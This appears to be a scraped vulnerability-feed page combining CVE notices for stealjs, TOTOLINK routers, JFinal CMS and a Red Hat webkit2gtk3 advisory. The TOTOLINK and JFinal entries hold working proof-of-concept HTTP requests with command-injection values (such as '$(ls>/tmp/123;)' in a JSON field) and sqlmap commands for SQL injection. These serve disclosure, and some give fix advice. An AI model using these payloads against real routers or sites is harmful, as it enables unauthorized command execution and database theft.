A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js.

CVE-2022-37260: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setdiagnosicfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter "system tools" - > "Ping diagnosis" page  
执行tls>/tmp/1.txt命令

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1  
    Content-Length: 52  
    Accept: application/json, text/javascript, */*; q=0.01  
    X-Requested-With: XMLHttpRequest  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36  
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
    Origin: http://192.168.0.1  
    Referer: http://192.168.0.1/advance/diagnosis.html?time=1659889464870  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: SESSION_ID=2:1591951611:2  
    Connection: close  
    
    {"ip":"aaaa\tls>/tmp/1.txt","num":"2","topicurl":"setDiagnosisCfg"}   
    

**Analysis Report:**  
In the setdiagnosicfg function, the value string corresponding to the IP in the JSON data is directly put into V6

  
Just write a string such as $(CMD) in the value corresponding to the IP to complete the command injection at CMD

CVE-2022-38534: TOTOLINK-720R/TOTOLINK 720 RCode Execution.md at fb6ba109ba9c5bd1b0d8e22c88ee14bdc4a75e6b · Jfox816/TOTOLINK-720R

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

Cannot retrieve contributors at this time

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**What is more**

my test

    POST /jfinal_cms/admin/contact/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 98
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
    

run it in sqlmap！！！ use -r

CVE-2022-37201: someEXP_of_jfinal_cms/sql4.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js.

CVE-2022-37264: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.

CVE-2022-37262: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/system/config/list  --thread 8 --batch --smart  --random-agent --data "oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**PACKET**

    POST /jfinal_cms/system/config/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 131
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/system/config/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360,1659131581; Hm_lpvt_1040d081eea13b44d84a4af639640d51=1659131581
    Connection: close
    
    oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10

CVE-2022-37207: someEXP_of_jfinal_cms/sql10.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Red Hat Security Advisory 2022-6540-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: webkit2gtk3 security update  
Advisory ID:       RHSA-2022:6540-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6540  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-32893  
====================================================================  
1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

The following packages have been upgraded to a later upstream version:  
webkit2gtk3 (2.36.7).

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to  
arbitrary code execution (CVE-2022-32893)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2121645 - CVE-2022-32893 webkitgtk: processing maliciously crafted web content may lead to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_6.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32893  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk0dzjgjWX9erEAQgJiw/+LYAkLQ3B+egDz2T8gBO2HzEtHgA8L7TO  
aFWvgGSnt32NlsOLFg1R3FxvGRVurR5Vgx2QN4tvVi/iYIgGw1WTSCC2GaiamjoP  
AawahjPf08LboH3d96QHN7rumXeXLUcymQyG4p4BPnEOqYPaKKdmj5CPaGWM/o+l  
ECo8POkVp0mHb4HOCL8iudG5aKDmEB5OqHfQS0XmFU3392yazpD6Y1DwpIfCNAhb  
ptdcqHrycH+QFUdd3YmtQj567R5+q/DAKFN60KHdwT+JeiRwdV9k89cAoWIJA6Hh  
3ZxRuVbc108rySf/9tdZSjl7nw4IbLwcbScUwUHfHzjFfS3h7u+kkDLL10c4sfWf  
psc1mGVUXzLN6qBaWiY96bXOUOzX72LkC0LqhgDOfjBvaGzJjFwfydDgql/TPkSZ  
478+0r5JD6sFsboLugtqhXMLNpJtxYGBSMUA31Bjmf8jWGwKrzZCbxUMuQIHk7VG  
4M9gdZbu5wQw6fhksOlHGowoXEvc6UTB36eSLvZ76OK65yoXmpOXTFjIFfmDACkV  
M4GVQGpNglQWn/4jBXjebEeFC86baScn97NpCL41FK9AXlP7xBPaCN++DjAYDlbg  
NJf8tizErS4zMa1moMYL2DEac/nhLJDwtKaCvftcdRPrVnQZEZto7Chvf1FgNAJc  
+nurAiBV/zc=W4oO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6540-01

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-32893: webkitgtk: processing maliciously crafted web content may lead to arbitrary code execution


RHSA-2022:6540: Red Hat Security Advisory: webkit2gtk3 security update

TOTOLink A700RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the lang parameter in the function cstesystem. This vulnerability allows attackers to execute arbitrary commands via a crafted payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)Command injection vulnerability****Overview**

Manufacturer's website information：http://totolink.net/

Firmware download address ：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content under the lang parameter to v2, then formats v2 into the v6 stack through the snprintf function, and finally executes the content in v6 through the cstesystem function, which has a command injection vulnerability

**POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
    
2.  Attack with the following POC attacks
    

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setWanCfg",
"lang":"1$(ls>/tmp/123;)"}

The results of the reproduction are as follows

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

Tag

#webkit